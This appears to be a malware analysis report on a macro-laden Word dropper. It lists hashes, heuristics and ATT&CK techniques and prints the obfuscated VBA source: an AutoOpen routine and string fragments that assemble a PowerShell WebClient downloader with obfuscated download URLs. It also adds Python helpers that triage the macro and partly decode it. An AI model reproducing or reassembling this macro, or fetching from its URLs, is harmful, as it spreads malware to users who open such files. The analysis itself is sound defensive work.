Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4138659b0d9c3db3…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 137.5 KB
Created: 2018-02-09 15:22:00 (document metadata, self-reported by the authoring application and trivially forged; do not treat it as a build date)
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: c88adf2b08e0d77c943e5d25b1798131
SHA-1: e61da90b8255858bfbee39dbd75cc57af770015e
SHA-256: 4138659b0d9c3db3e94a1defa7274cabd0075efd78025678d813e8b4f424ea4f
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word document carrying a VBA project whose AutoOpen procedure runs as soon as the user opens the file and accepts the macro prompt (T1204.002). The macro body is padded with arithmetic on undefined variables under On Error Resume Next, so every filler line fails silently, while the real payload is assembled from string literals that are trimmed with Mid() and spliced with junk tokens (OFl, u7W, z1b and literal '+' sequences). Even before decoding, the fragments contain recognizable PowerShell: System.Net.WebClient, [chaR]nn+[chaR]nn character arithmetic, -cREPLACe substitutions and a break;}catch{}} tail from a retry loop, together with several URL-like strings. That is consistent with a downloader that tries a list of URLs in turn. AutoOpen passes the result of HiriLapqWEzCod(), the procedure in which the fragments are assembled, to a further procedure via Application.Run; the Shell() call flagged below is where that command would leave the Office process. The ClamAV name Doc.Dropper.Agent-6444901-0 agrees with this reading, but a signature label is not evidence of behaviour: the decoded command and URL list are what belong in a report or blocklist, and they should be recovered by emulating or running the macro rather than read off the visible source.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6444901-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6444901-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Note: the generic text of this rule does not fit this sample, where a VBA project was recovered (see Extracted artifacts). The marker most likely fired on the same AutoOpen string as OLE_VBA_AUTOOPEN and adds no independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://wiOFl+OFlz1b+z1btocarsOFl+OFl.HoXWpGHcMGqVWF  In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    The first URL carries the same OFl/u7W/z1b junk tokens as the macro string fragments and is not a usable indicator until they are stripped. The second is the standard DrawingML namespace URI found in any document with drawing content and is not an indicator at all.
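A first-pass triage of the kind the heuristics above describe, written here as an added example (it is not the scanner's own code): it looks for auto-exec entry points and execution tokens the way OLE_VBA_AUTOOPEN and OLE_VBA_SHELL do, and adds two signals visible in this sample, arithmetic-only filler lines and string assembly through Mid(). The token lists are an illustrative assumption, and the sample input is a constructed excerpt of the macro preview below with an End Function added so it parses as a complete module.

```python
import re

# Added example, not the report's scanner. Token lists below are an assumption
# chosen for illustration, not a published rule set.
AUTO_EXEC = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+"
    r"(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Workbook_Open)\b",
    re.I | re.M,
)
EXEC_TOKENS = {
    "Shell()": re.compile(r"\bShell\s*\(", re.I),
    "Application.Run": re.compile(r"\bApplication\.Run\b", re.I),
    "CreateObject": re.compile(r"\bCreateObject\s*\(", re.I),
    "WScript.Shell": re.compile(r"WScript\.Shell", re.I),
    "powershell": re.compile(r"powershell", re.I),
    "Net.WebClient": re.compile(r"Net\.WebClient", re.I),
}
# An assignment whose right-hand side is only identifiers, numbers and
# arithmetic: the filler shape seen throughout the extracted macro.
DEAD_ARITH = re.compile(r"^\s*\w+\s*=\s*[\w\s()*+\-/.]+$")
MID_ASSEMBLY = re.compile(r"\bMid\s*\(", re.I)

# Constructed excerpt of the extracted macro (lines copied from the preview,
# plus an End Function so the module is complete).
SAMPLE = """Attribute VB_Name = "mAzhJAqqwZTua"
Sub AutoOpen()
On Error Resume Next
chGPGNWBF = (1789645 * mitLljnL * 283909 - uVQRzVoIidTd) + FinfWCqNkVBHrw + Sqr(pjz) * (GjiMqwIsi / 8760940)
Application.Run "VmllTZHjYaiSn", HiriLapqWEzCod
fOXIMNKmb = (9170484 * nnzWYUJjmLFjZi * 4171970 - jirKkfqjzv) + TQjXOSGjzwvB + Sqr(dfirafwd) * (jaHjkLHzTZdi / 8117537)
End Sub
Function HiriLapqWEzCod()
On Error Resume Next
iPqzFVS = IEowWDVopX + Mid(QDj + "ojTJtwYpqYS+OFl+OFl0yb-OFl+u7W+u7WOFlou7W+u7Wbj'+'ectOFl+OFl0yOFl+O'+'Flz1b+z1bb)'+' SystemOFl+'+'OFl.Net.WOFl+OFu7W+u7WlebClOFz1b+zu7W'+'+u7W1bl+OFlienOFl+OF'+'lt;7hONSB = OFl+OFl'+'7h'+'OnjmzoUDiGTPwEhZaEFjZmN" + MYkC, 12, 179)
End Function
"""


def triage_vba(source: str) -> dict:
    """Score a decoded VBA module on auto-exec entry points, execution
    tokens, dead-code filler and string assembly."""
    code_lines = [l for l in source.splitlines()
                  if l.strip() and not l.lstrip().startswith("'")]
    auto_exec = sorted({m.group(1) for m in AUTO_EXEC.finditer(source)})
    exec_tokens = sorted(name for name, rx in EXEC_TOKENS.items() if rx.search(source))
    dead = sum(1 for l in code_lines if DEAD_ARITH.match(l))
    result = {
        "auto_exec": auto_exec,
        "exec_tokens": exec_tokens,
        "on_error_resume_next": bool(
            re.search(r"^\s*On Error Resume Next", source, re.I | re.M)),
        "dead_arith_lines": dead,
        "dead_arith_ratio": round(dead / max(len(code_lines), 1), 2),
        "mid_assembly_calls": len(MID_ASSEMBLY.findall(source)),
    }
    if auto_exec and exec_tokens:
        result["verdict"] = "high"      # runs on open and can execute something
    elif auto_exec or exec_tokens:
        result["verdict"] = "medium"
    else:
        result["verdict"] = "low"
    return result


if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE).items():
        print(f"{key}: {value}")
```

On this excerpt the scan reports AutoOpen plus Application.Run and rates the module high, but it does not see Net.WebClient, because the literal is split by the OFl/u7W/z1b tokens. Raw token matching is only a first pass; the string fragments have to be deobfuscated before a scan can be trusted to find the download and execution calls.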

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26667 bytes
SHA-256: 047053c86fedcf54520d6b90a3fd84ff96ceabf1af1b98dad0fd92751b8ae319
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mAzhJAqqwZTua"
Sub AutoOpen()
On Error Resume Next
chGPGNWBF = (1789645 * mitLljnL * 283909 - uVQRzVoIidTd) + FinfWCqNkVBHrw + Sqr(pjz) * (GjiMqwIsi / 8760940)
WjGJmodwB = (3263042 * KbKAO * 1791334 - YlTC) + qWPXVzjOKI + Sqr(NovwFIZ) * (fjTwEYMbpCUw / 5088547)
UAPmWRHBU = (530169 * BHwLSKAQLcWzWa * 2156340 - JVrLqMttofMiqS) + KdUuwbBIiBEk + Sqr(zBsMLSwfdqJpNC) * (nwSZtnMV / 480383)
Application.Run "VmllTZHjYaiSn", HiriLapqWEzCod
fOXIMNKmb = (9170484 * nnzWYUJjmLFjZi * 4171970 - jirKkfqjzv) + TQjXOSGjzwvB + Sqr(dfirafwd) * (jaHjkLHzTZdi / 8117537)
QFoqQSvWh = (7802846 * RhEzwGSwM * 5433363 - GPihubCfVXv) + OcDjOfhUzldS + Sqr(GKw) * (HjRNhz / 4710603)
End Sub
Function HiriLapqWEzCod()
On Error Resume Next
dwGTRajHhuQ = (9625630 * TvST * 8112317 - WEnQKO) + CwWXJTSqawZs + Sqr(bVBXfJUSpI) * (fjpzjCGs / 384982)
EpiOsCCRAV = (2460198 * LqAajfNszt * 5105561 - nADPk) + uXM + Sqr(AsciTHYpjqTu) * (KWEap / 917548)
VIAdd = (9484433 * cEWBw * 6046093 - VsHoUXpIzFL) + TJMj + Sqr(sqtsjaFTPiYn) * (cVbl / 3775827)
iPqzFVS = IEowWDVopX + Mid(QDj + "ojTJtwYpqYS+OFl+OFl0yb-OFl+u7W+u7WOFlou7W+u7Wbj'+'ectOFl+OFl0yOFl+O'+'Flz1b+z1bb)'+' SystemOFl+'+'OFl.Net.WOFl+OFu7W+u7WlebClOFz1b+zu7W'+'+u7W1bl+OFlienOFl+OF'+'lt;7hONSB = OFl+OFl'+'7h'+'OnjmzoUDiGTPwEhZaEFjZmN" + MYkC, 12, 179)
fVPvA = (3406676 * rcqiiqY * 132169 - TDYiZ) + bVmf + Sqr(SbTM) * (rdWjIVtDuPsn / 3671682)
ksLOZDMwu = (8993686 * rUTpE * 2730200 - QMaASN) + BPJdp + Sqr(MBTDwKUkJMnB) * (WRwIdHbbNJGH / 448131)
nOEVFBnYjjB = (6116640 * sziKdDwpAPrut * 5994769 - Amwb) + rCHfVOPwrNwv + Sqr(arKddYnZbw) * (lNhwGJTIaoCpr / 568945)
nqqRfj = jiZmUOGVdwdzP + Mid(fIImupR + "rqddbu7W+u7WOFlSDC);bOFl+OFlreak;}u7W+u7WOFl+OFlcatchOFl+OFl{}}OFl)-cREPLACe([chaR]111+[chaR]70+[chaR]68),[c'+'haR]92  -REPLAcE ([c'+'haR]110+[chaz1b+z1bR]102RZTNJKCCYsiTbwTO" + VEt, 5, 154)
lEnaqwhQhYp = (5817224 * apzPJ * 2014000 - JinXmldIjiV) + Orfb + Sqr(tliwUQnq) * (soEJQJhvkEh / 3636104)
zjlfFzB = (7393907 * pRIaiV * 2946597 - uOYWYjq) + RzhAtoEWRLYS + Sqr(btGH) * (piLqIUW / 4626760)
IjrJY = (8930701 * lulBFvmhllXA * 2645270 - ITwwNSURODr) + dbqMi + Sqr(uOkXZXN) * (oMUVz / 7805651)
qSlMzimwU = PnwzmTvPSnwWJ + Mid(nRQEOuHjS + "NRdpLDjCZEW+OFlenu7W+u7WtroinfOFl+OFlisz1b+z1u7W+u7Wbsi.ez1b+z1bu/XO'+'Fl+OFlgxk/OFl+OFl?http:/OFl+OFl/OFl+OFlteu7W+'+'u7Wz1b+z1bcnopiOFl+OFla.org/TOFl+OFu'+'7W+u7Wl'+'o1OFl+OFlyEaTYFWqIvmiAzkUdLFwXrwqihi" + iunUpYCSapJzb, 12, 167)
UdohChlZb = (8823919 * oDK * 3550579 - QrrNUudVvNuiQ) + vvzrJzMX + Sqr(cHzNRolDsnG) * (tCKOGBnBjLU / 5981754)
WaQDjzqiN = (5818229 * GoMAVjtFPGXhLj * 1936671 - CuKpC) + odDwZWFQmRjTi + Sqr(rrSZqomEqYpGrX) * (aUov / 2494687)
KkhtrwVXdMI = (9918734 * wYHXAwTFwrz * 2534498 - LbkzOGk) + iGSfhIMzuXV + Sqr(HutSTnoklawJdF) * (wkphGOzSSosSpG / 1600641)
CMiCpwPSqm = ahpYaKbVU + Mid(iJtRLqZHCG + "Z+'+[chaR]103u7W+u7W),[chaR]96-cREPLACu7W+u7W'+'e'+'  OFl0'+'u7W+u7WybOFl,[chaR]39-'+'cREPLAC'+'e ([chaR]55+[chaR]104+z1b+z1b[chaR]79),[chaR]36-cREPLAz1b+z1bCe OFlIbGOFl,[chaR]34uBjjSrPuBwlj" + AltYiBiIwtGCvD, 2, 177)
pkwOS = (5460347 * daUwdcWih * 2714863 - jRSJHoOwOKfrq) + svwdMhAoFo + Sqr(GTWY) * (icmhfwvwja / 3743739)
pvbNFkWPbnU = (2669922 * RwjiTl * 6477696 - AUjvrLdD) + VsY + Sqr(jCEJzwACum) * (maopVb / 9940551)
siPvRDLjnYZ = (7084602 * IdHGmnkRsiFa * 8025872 - kvfVUohWFi) + IRWohZV + Sqr(hYCu) * (WLLjJMjnwsDtqG / 5959948)
wOYzvI = TbPKQhR + Mid(aRzBEIJBcL + "pbGs/?OFl+OFlhtOFl+OFltp:/OFl+OFl/spOFl+OFl'+'orOFl+OFl'+'tfishing.vip/z1b+z'+'1b'+'tOFl+OFl9u7W+u7WI0fu7W+u7W/?http:/z1b+z1b/OFu7W+u7Wl+OFljaOFl+OFlvi'+'yale.comhRmJzn" + NFqPiK, 5, 158)
CVnPDLRJ = (8406148 * qMYliVK * 8735623 - zGzDwUojVsII) + SKZiYIQv + Sqr(hSqtGjXDfXFSj) * (NpEKYpzBiKUtO / 2366982)
wbMRkbK = (9962163 * BcuBYjNDOEMSNl * 563144 - mSM) + TwsFwfjfZMVK + Sqr(iVc) * (iSjbBvTd
... (truncated)
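The string fragments in the preview can be partially decoded statically. The following is an added example, not part of the report or of oletools: it reproduces the VBA Mid() trimming on three literals copied verbatim from the preview, removes the splices, resolves the [chaR] arithmetic and collects the -cREPLACe pairs that form the next substitution layer. Everything it assumes is inferred from the preview and labelled as such in the code: that OFl, u7W and z1b are junk tokens spliced as X+X next to literal '+' sequences, that a lone OFl stands for a single quote, and that the -cREPLACe pairs are applied by the PowerShell to itself. The URL-bearing fragments further up decode the same way and are deliberately left out.

```python
import re

# Added example, not part of the report or of oletools. All of the following is
# an assumption inferred from the macro preview, not a documented format:
#   - OFl, u7W and z1b are junk tokens spliced into PowerShell string literals
#     as X+X, next to literal '+' splices; both are no-op concatenations;
#   - a lone OFl stands for a single quote;
#   - [chaR]N+[chaR]N runs build characters, and "-cREPLACe X,Y" pairs define a
#     further substitution layer the PowerShell applies to itself before running.
JUNK_TOKENS = ("OFl", "u7W", "z1b")
QUOTE_TOKEN = "OFl"

# String literals copied verbatim from the preview, with the Mid() start and
# length the macro applies to each (1-based, as in VBA).
FRAGMENTS = {
    "webclient": ("ojTJtwYpqYS+OFl+OFl0yb-OFl+u7W+u7WOFlou7W+u7Wbj'+'ectOFl+OFl0yOFl+O'+'Flz1b+z1bb)'+' SystemOFl+'+'OFl.Net.WOFl+OFu7W+u7WlebClOFz1b+zu7W'+'+u7W1bl+OFlienOFl+OF'+'lt;7hONSB = OFl+OFl'+'7h'+'OnjmzoUDiGTPwEhZaEFjZmN", 12, 179),
    "loop": ("rqddbu7W+u7WOFlSDC);bOFl+OFlreak;}u7W+u7WOFl+OFlcatchOFl+OFl{}}OFl)-cREPLACe([chaR]111+[chaR]70+[chaR]68),[c'+'haR]92  -REPLAcE ([c'+'haR]110+[chaz1b+z1bR]102RZTNJKCCYsiTbwTO", 5, 154),
    "replace": ("Z+'+[chaR]103u7W+u7W),[chaR]96-cREPLACu7W+u7W'+'e'+'  OFl0'+'u7W+u7WybOFl,[chaR]39-'+'cREPLAC'+'e ([chaR]55+[chaR]104+z1b+z1b[chaR]79),[chaR]36-cREPLAz1b+z1bCe OFlIbGOFl,[chaR]34uBjjSrPuBwlj", 2, 177),
}

CHAR_RUN = re.compile(r"\[chaR\]\d+(?:\+\[chaR\]\d+)*", re.I)
CHAR_NUM = re.compile(r"\[chaR\](\d+)", re.I)
CREPLACE = re.compile(r"-cREPLACe\s*\(?'?([^',()]+?)'?\)?,(.)", re.I)


def vba_mid(s, start, length):
    """VBA Mid(): 1-based start, at most `length` characters."""
    return s[start - 1:start - 1 + length]


def strip_splices(s):
    """Drop '+' and X+X splices until nothing changes. Tokens nest
    (e.g. z1b+z1u7W+u7Wb), so a single pass is not enough."""
    prev = None
    while prev != s:
        prev = s
        s = s.replace("'+'", "")
        for tok in JUNK_TOKENS:
            s = s.replace(tok + "+" + tok, "")
    return s


def resolve_chars(s):
    """[chaR]55+[chaR]104+[chaR]79 -> 7hO (surrounding parentheses are kept)."""
    return CHAR_RUN.sub(
        lambda m: "".join(chr(int(n)) for n in CHAR_NUM.findall(m.group(0))), s)


def decode_fragment(literal, start, length):
    text = resolve_chars(strip_splices(vba_mid(literal, start, length)))
    return text.replace(QUOTE_TOKEN, "'")   # hypothesis: a lone OFl is a quote


def decode_fragments():
    return {name: decode_fragment(*args) for name, args in FRAGMENTS.items()}


def replacement_table(decoded):
    """Collect the -cREPLACe X,Y pairs found in one decoded fragment."""
    return dict(CREPLACE.findall(decoded))


def apply_table(decoded, table):
    """Apply the recovered inner substitutions (e.g. 7hO -> $) to a fragment."""
    for old, new in table.items():
        decoded = decoded.replace(old, new)
    return decoded


if __name__ == "__main__":
    decoded = decode_fragments()
    table = {}
    for text in decoded.values():
        table.update(replacement_table(text))
    print("inner substitutions:", table)
    for name, text in decoded.items():
        print(f"[{name}] {apply_table(text, table)}")
```

The decoder recovers System.Net.WebClient, the break;}catch{}} retry-loop tail and an inner table mapping 0yb to a single quote, 7hO to $, IbG to a double quote and oFD to a backslash; the fragment assigning $NSB only makes sense once that table is applied. What it cannot recover is the order in which the macro concatenates the fragments or the content of the truncated part of the module, so the full command line and the URL list still have to come from emulating or running the macro in an isolated environment, and every decoded string should be checked against that dynamic result before it is used as an indicator.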